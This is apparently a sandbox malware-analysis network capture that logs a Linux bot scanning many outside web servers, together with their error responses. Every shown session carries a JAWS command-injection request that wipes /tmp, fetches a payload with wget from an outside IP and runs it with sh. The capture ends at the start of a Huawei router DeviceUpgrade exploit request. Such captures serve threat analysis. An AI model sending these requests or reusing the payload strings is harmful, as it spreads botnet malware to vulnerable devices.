                                                            Jan 26, 2024 15:31:28.904016018 CET232OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:31:29.259109974 CET308INHTTP/1.1 404 Not Found
                                                            Server: nginx/1.20.1
                                                            Date: Fri, 26 Jan 2024 14:31:29 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 153
                                                            Connection: keep-alive
                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 30 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                            Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.20.1</center></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            108192.168.2.234793667.205.162.9980
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:31:27.619333982 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:31:27.743022919 CET434INHTTP/1.1 301 Moved Permanently
                                                            Server: nginx/1.20.1
                                                            Date: Fri, 26 Jan 2024 14:31:27 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 169
                                                            Connection: keep-alive
                                                            Location: https://127.0.0.1/shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws
                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 30 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                            Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx/1.20.1</center></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            109192.168.2.2358894192.169.179.3680
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:31:27.638299942 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:31:27.781761885 CET1286INHTTP/1.1 400 Bad Request
                                                            Date: Fri, 26 Jan 2024 14:31:27 GMT
                                                            Server: Apache
                                                            Upgrade: h2,h2c
                                                            Connection: Upgrade, close
                                                            Accept-Ranges: bytes
                                                            Vary: Accept-Encoding
                                                            Cache-Control: no-cache, no-store, must-revalidate
                                                            Pragma: no-cache
                                                            Expires: 0
                                                            Content-Type: text/html
                                                            Data Raw: 0a 0a 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 50 72 61 67 6d 61 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 45 78 70 69 72 65 73 22 20 63 6f 6e 74 65 6e 74 3d 22 30 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 34 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 34 32 38 35 37 31 34 32 39 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 66 66 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 32 46 33 32 33 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 73 65 63 74 69 6f 6e 2c 20 66 6f 6f 74 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 61 75 74 6f 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 20 61 75 74 6f 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 20 31 30 70 78 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 72 65 73 70 6f 6e 73 65 2d 69 6e 66 6f 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 43 43 43 43 43 43 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 73 74 61 74 75 73 2d 63 6f 64 65 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d
                                                            Data Ascii: <!DOCTYPE html><html> <head> <meta http-equiv="Content-type" content="text/html; charset=utf-8"> <meta http-equiv="Cache-control" content="no-cache"> <meta http-equiv="Pragma" content="no-cache"> <meta http-equiv="Expires" content="0"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>400 Bad Request</title> <style type="text/css"> body { font-family: Arial, Helvetica, sans-serif; font-size: 14px; line-height: 1.428571429; background-color: #ffffff; color: #2F3230; padding: 0; margin: 0; } section, footer { display: block; padding: 0; margin: 0; } .container { margin-left: auto; margin-right: auto; padding: 0 10px; } .response-info { color: #CCCCCC; } .status-code { font-
                                                            Jan 26, 2024 15:31:27.781775951 CET1286INData Raw: 73 69 7a 65 3a 20 35 30 30 25 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 73 74 61 74 75 73 2d 72 65 61 73 6f 6e 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 35 30 25 3b 0a 20 20 20 20 20 20
                                                            Data Ascii: size: 500%; } .status-reason { font-size: 250%; display: block; } .contact-info, .reason-text { color: #000000; } .additional-info { backgr
                                                            Jan 26, 2024 15:31:27.781789064 CET1286INData Raw: 20 20 70 61 64 64 69 6e 67 3a 20 31 30 70 78 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 69 6e 66 6f 2d 68 65 61 64 69 6e 67 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 62 6f 6c 64 3b 0a
                                                            Data Ascii: padding: 10px; } .info-heading { font-weight: bold; text-align: left; word-break: break-all; width: 100%; } .info-server address { text-align: left;
                                                            Jan 26, 2024 15:31:27.781871080 CET1286INData Raw: 2d 69 6d 61 67 65 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6c 6f 61 74 3a 20 6c 65 66 74 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 2e 69 6e 66 6f 2d 68 65 61 64 69 6e 67 20 7b 0a 20 20
                                                            Data Ascii: -image { float: left; } .info-heading { margin: 62px 0 0 98px; } .info-server address { text-align: left; position: absolute;
                                                            Jan 26, 2024 15:31:27.781893015 CET1286INData Raw: 77 71 4e 69 62 59 33 38 6d 6c 76 58 4b 44 64 55 35 70 44 48 33 54 52 6b 6c 34 30 76 78 4a 6b 5a 2b 44 4f 32 4e 75 2f 33 48 6e 79 43 37 74 31 35 6f 62 47 42 74 71 52 46 52 58 6f 36 2b 30 5a 35 59 51 68 35 4c 48 64 39 59 47 57 4f 73 46 2b 39 49 73
                                                            Data Ascii: wqNibY38mlvXKDdU5pDH3TRkl40vxJkZ+DO2Nu/3HnyC7t15obGBtqRFRXo6+0Z5YQh5LHd9YGWOsF+9Is5oQXctZKbvdAAtbHHM8+GLfojWdIgPff7YifRTNiZmusW+w8fDj1xdevNnbU3VFfTEL/W33pfH31cGYBpgW9Lba3Ic8C8iA77NLe514vu8BPj6/n3lCd/VkgKXGkwYUQHAaM+yQunBmNSwbRVYh+kOcgMhvRDB1Md
                                                            Jan 26, 2024 15:31:27.781907082 CET1286INData Raw: 4e 6c 66 38 6f 56 45 62 4b 38 41 35 35 36 51 51 4b 30 4c 4e 72 54 6a 32 74 69 57 66 63 46 6e 68 30 68 50 49 70 59 45 56 47 6a 6d 42 41 65 32 62 39 35 55 33 77 4d 78 69 6f 69 45 72 52 6d 32 6e 75 68 64 38 51 52 43 41 38 49 77 54 52 41 57 31 4f 37
                                                            Data Ascii: Nlf8oVEbK8A556QQK0LNrTj2tiWfcFnh0hPIpYEVGjmBAe2b95U3wMxioiErRm2nuhd8QRCA8IwTRAW1O7PAsbtCPyMMgJp+1/IaxqGARzrFttphUR+MvEPSx+6m/pCxEi3Y7p485ESAVmuldvzSTKw2fqHSGM5hBW1IUI0f/LdONtEUKXGC95jK+Rg4QBVwNmlePZVjTxuo24kWMrQHg/nZzxDqmqFRFC799+dbEirMoVEXhVA
                                                            Jan 26, 2024 15:31:27.781944990 CET1145INData Raw: 48 73 6a 30 79 46 2b 49 77 48 55 75 73 37 73 6d 56 68 38 49 48 56 47 49 77 4a 74 4c 79 37 75 4e 36 50 65 2f 77 41 6e 72 42 78 4f 6e 41 61 79 49 53 4c 57 6b 51 38 77 6f 42 4b 79 52 2b 2b 64 55 54 73 75 45 4b 2b 4c 38 70 32 42 44 34 66 47 64 73 66
                                                            Data Ascii: Hsj0yF+IwHUus7smVh8IHVGIwJtLy7uN6Pe/wAnrBxOnAayISLWkQ8woBKyR++dUTsuEK+L8p2BD4fGdsfqhxGQTQZluHULXrRsUFfBE0OgzIlraR8vkw6qnXmuDSF8RgS8th+d+phci8FJf1fwapi44rFpfqTZAnW+JFRG3kf94Z+sSqdR1UIiI/dc/B6N/M9WsiADO00A3QU0hohX5RTdeCrstyT1WphURTBevBaV4iwYJGGc
                                                            Jan 26, 2024 15:31:27.782085896 CET1286INData Raw: 34 30 30 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 73 74 61 74 75 73 2d 72 65 61 73 6f 6e 22 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 20 20 20 20
                                                            Data Ascii: 400</span> <span class="status-reason">Bad Request</span> </section> <section class="contact-info"> Please forward this error screen to 36.179.169.192.host.secureserver.net's <a href="ma
                                                            Jan 26, 2024 15:31:27.782099009 CET402INData Raw: 63 70 61 6e 65 6c 2e 63 6f 6d 2f 3f 75 74 6d 5f 73 6f 75 72 63 65 3d 63 70 61 6e 65 6c 77 68 6d 26 75 74 6d 5f 6d 65 64 69 75 6d 3d 63 70 6c 6f 67 6f 26 75 74 6d 5f 63 6f 6e 74 65 6e 74 3d 6c 6f 67 6f 6c 69 6e 6b 26 75 74 6d 5f 63 61 6d 70 61 69
                                                            Data Ascii: cpanel.com/?utm_source=cpanelwhm&utm_medium=cplogo&utm_content=logolink&utm_campaign=400referral" target="cpanel" title="cPanel, Inc."> <img src="/img-sys/powered_by_cpanel.svg" height="20" alt="cPanel, Inc." />


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            110192.168.2.235615645.201.221.1280
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:31:27.778517962 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:31:27.943810940 CET502INHTTP/1.1 400 Bad Request
                                                            Content-Type: text/html; charset=us-ascii
                                                            Server: Microsoft-HTTPAPI/2.0
                                                            Date: Fri, 26 Jan 2024 14:31:27 GMT
                                                            Connection: close
                                                            Content-Length: 311
                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 30 2e 20 54 68 65 20 72 65 71 75 65 73 74 20 69 73 20 62 61 64 6c 79 20 66 6f 72 6d 65 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Bad Request</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Bad Request</h2><hr><p>HTTP Error 400. The request is badly formed.</p></BODY></HTML>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            111192.168.2.233919820.31.197.780
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:31:27.808193922 CET232OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:31:28.002819061 CET459INHTTP/1.1 400 Bad Request
                                                            Content-Type: text/html; charset=us-ascii
                                                            Date: Fri, 26 Jan 2024 14:31:27 GMT
                                                            Connection: close
                                                            Content-Length: 311
                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 30 2e 20 54 68 65 20 72 65 71 75 65 73 74 20 69 73 20 62 61 64 6c 79 20 66 6f 72 6d 65 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Bad Request</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Bad Request</h2><hr><p>HTTP Error 400. The request is badly formed.</p></BODY></HTML>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            112192.168.2.235684031.136.62.4580
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:31:27.817809105 CET232OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:31:28.455971003 CET232OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:31:29.703743935 CET232OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:31:32.327308893 CET232OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:31:37.446588039 CET232OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:31:47.429207087 CET232OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:32:07.394526958 CET232OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:32:48.348645926 CET232OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            113192.168.2.2357886125.141.214.17680
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:31:27.982300043 CET232OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:31:28.271234989 CET340INHTTP/1.1 200 OK
                                                            Connection: Close
                                                            Content-Length: 149
                                                            Content-Type: text/html
                                                            Date: Fri, 26 Jan 2024 14:31:29 GMT
                                                            Pragma: no-cache
                                                            Cache-Control: no-cache, no-store, must-revalidate
                                                            Data Raw: 3c 62 72 3e 0d 0a 3c 62 72 3e 0d 0a 3c 63 65 6e 74 65 72 3e 0d 0a 3c 68 32 3e 0d 0a 54 68 65 20 72 65 71 75 65 73 74 20 2f 20 72 65 73 70 6f 6e 73 65 20 74 68 61 74 20 61 72 65 20 63 6f 6e 74 72 61 72 79 20 74 6f 20 74 68 65 20 57 65 62 20 66 69 72 65 77 61 6c 6c 20 73 65 63 75 72 69 74 79 20 70 6f 6c 69 63 69 65 73 20 68 61 76 65 20 62 65 65 6e 20 62 6c 6f 63 6b 65 64 2e 0d 0a 3c 2f 68 32 3e 0d 0a 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 62 72 3e
                                                            Data Ascii: <br><br><center><h2>The request / response that are contrary to the Web firewall security policies have been blocked.</h2></center><br>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            114192.168.2.2359550156.250.15.7380
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:31:28.086608887 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:31:28.478760004 CET502INHTTP/1.1 400 Bad Request
                                                            Content-Type: text/html; charset=us-ascii
                                                            Server: Microsoft-HTTPAPI/2.0
                                                            Date: Fri, 26 Jan 2024 14:30:56 GMT
                                                            Connection: close
                                                            Content-Length: 311
                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 30 2e 20 54 68 65 20 72 65 71 75 65 73 74 20 69 73 20 62 61 64 6c 79 20 66 6f 72 6d 65 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Bad Request</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Bad Request</h2><hr><p>HTTP Error 400. The request is badly formed.</p></BODY></HTML>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            115192.168.2.2358310156.77.134.10737215
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:31:28.507560015 CET869OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                            Content-Length: 430
                                                            Connection: keep-alive
                                                            Accept: */*
                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
